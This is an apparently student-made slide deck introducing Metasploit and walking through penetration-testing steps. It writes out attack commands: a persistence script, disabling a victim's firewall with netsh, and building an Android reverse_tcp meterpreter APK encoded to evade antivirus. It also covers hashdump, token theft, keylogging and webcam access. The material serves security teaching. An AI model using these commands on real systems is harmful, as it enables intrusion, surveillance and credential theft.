This document provides an introduction to Metasploit, including its history, architecture, modules, and how to use it for tasks like port scanning, exploitation, maintaining access, post-exploitation, privilege escalation, bypassing firewalls, and attacking Linux and Android systems. It describes how Metasploit was created by H.D. Moore and is now maintained by Rapid7, its core components and interfaces, and how to get started using exploits, payloads, and the msfconsole interface.

1. INTRODUCTION TO
METASPLOIT
#METASPLOIT
G.Manideep,
@mani0x00
-God of Framework’s

2. #whoami
<?php
$var = “@mani0x00”;
If ($var == script kiddie){
Echo ‘security flows in blood ’;
}
Else if ($var == white hat){
Echo ‘security flows in blood’;
}
Else{
Echo ‘security flows in blood’;
}
?>
G.Manideep,
B.tech 3rd year ,E.C.E
@mani0x00

3. #Creato
r
 Developer of Metasploit
Framework.
 Chief Researcher at Boston.
 Leading provider of security
data
and analytics software and
cloud
Solutions.

4. #History
 In Oct 2003 ‘DEFCON’ Metasploit 1.0 was released
with 11 exploits
by H.D.Moore.
Firstly, it was completely coded in Perl and later
completely re-coded in Ruby.
Acquired by Rapid7 in 2009 under some terms and
conditions.
Remains open source 

5. #Getting started
#vulnerability
A Vulnerability is a weakness of a system, which
allows the attacker to Exploit the system.
VULNERABIL
ITY

6. #Getting started
#Exploit
An Exploit is an attack on a system, especially one that
takes advantage of a particular Vulnerability of the
system using Payloads.

7. #Getting started
#Payload
A Payload is a piece of code that executes in the
vulnerable system after exploitation of the system.

8. Tools
Libraries
REX
MSF core
MSF basePlugins
Modules
Auxiliary Payloads Exploits Encoders Nops
#Architecture
Interfaces
Console
CLI
WEB
Armitage

9. #libraries
rex
msf:: core
msf :: base

10. #Modules
Exploit’s
Payload’s
Auxiliary’s
Encoders
Nops

11. #Auxiliary’s
Typically, an Exploit without Payload is called
Auxiliary.
Used for scanning, fuzzing, and some
automated tasks.
Makes use of mixins.
To run type in Run.

12. #Encoders
To evade anti-viruses encoders are used.
Payload’s are encrypted.
E.g.
• Shikata_ga_nai
• Nonaplha
• Bloxor

13. #Nops
Mainly used to keep the size of the payload
consistent.
Having 8 nops.

14. #Interfaces
 #msfcli
 #msfconsole
 #msfweb
 #Armitage(GUI)

15. #Armitage (Gui)
Developed by Raphel
Mudge

16. #msfconsole
Which is a interactive console.
starting msfconsole

17. #msfconsole
Here our journey begins 
 msf >

18. #let’s attack

19. #Port scanning
which is for information gathering.
Nmap is used for port scanning.
Auxiliary’s also can be used.
As information gathering is important in pen
testing, let’s do
a traditional scanning .

20. #Port scanning
Using Auxiliary’s:

21. #Port scanning
Using Nmap:

22. #Exploitation
Mostly an attacker send’s a combination of Exploit and
Payload.
In msfconsole there are some simple commands that
makes our
work pretty easy 
some of them are (core commands):
Search Use
Set

23. #Exploitation
Using Exploit:
Just type in use <path of suggested exploit’s>
prefer the exploit which has a good ranking.

24. #Exploitation
Setting Parameters:
Just type show options and find the parameters to
be filled.
Then set the parameter by typing ‘set
<parameter> <value>’.

25. #Exploitation
Similar to Exploit’s search, search for appropriate
Payload.
Then Set using ‘set PAYLOAD’ and fill the payload
parameters.
Then Just type in “Exploit”.

26. #some successful
exploits
ms03_026dcom
ms08_067_netapi (ever green :D )
ms11_050_mshtml
ms10_042_helpctr_xss_cmd_exec
ms10_046_shortcut_icon_dllloader
dreamftp_format
distcc_exec (for linux)

27. #Maintaining access
By executing a script with some arguments as
shown below
-run persistence –S(admin priv) –i(time int) –
p(rport) –r(lhost)

28. #Maintaining access
By listening on the specified port using multi-
handler exploit

29. #Post Exploitation
Using this meterpreter we can perform different
tasks by getting
the privileges of the victim .
Can grab a screen shot’s, keylogging by loading
and much more with
• Espia
• Incognito
• Pivot
• Sniffer
• Priv

30. #Post Exploitation
Can also perform using modules.
Let’s take multiple screen shots in a certain
intervals.

31. #Post Exploitation
Margate's to another process which has admin
privileges
and then completes the task.

32. #Post Exploitation
What else we can do in post exploitation?
Let’s see some of them,
-Keylogging
-Screen shots
-view live screen
-access webcam
-take control of keyboard and mouse
-del user
-pivort
-vm detection and many more..

33. #Privilege Escalation
what can you get from the system privileges
which are used to
be protected is called Privilege escalation.
Some of them are migrating the process,
stealing the tokens to get
the desired privileges.
 Let’s take a look on some of them .

34. #Privilege Escalation
Can migrate to pid’s which has admin privileges.

35. #Privilege
Escalation
By loading Incognito, We can steal( impersonate )
the tokens
to get privileges.

36. #Privilege Escalation
To use type in impersonate_token<token>

37. #Privilege Escalation
#HashDump:
Dumps all the user’s usernames and passwords

38. #What else we
can do?
Even can sniff the packets of the victim
remotely
Evading Firewall’s
Let’s take a look

39. #Bypassing Firewall

40. #Bypassing
FirewallAfter getting a meterpreter , get access to shell and
type
> netsh firewall show opmode

41. #Bypassing Firewall
Now type
>netsh firewall set opmode mode= DISABLE

42. #Attacking Linux
Using distcc_exec

43. #Attacking Android
Using msfpayload
msfpayload android/meterpreter/reverse_tcp
LHOST=<loc-ip>
LPORT=<any> R> /(desired path for saving)<file>.apk
Install that apk file into device
if there is any anti-virus encode them with encoders

44. #Attacking Android
Listen on mentioned port using multi-handler exploit

45. #Thank you!
-
@mani0x0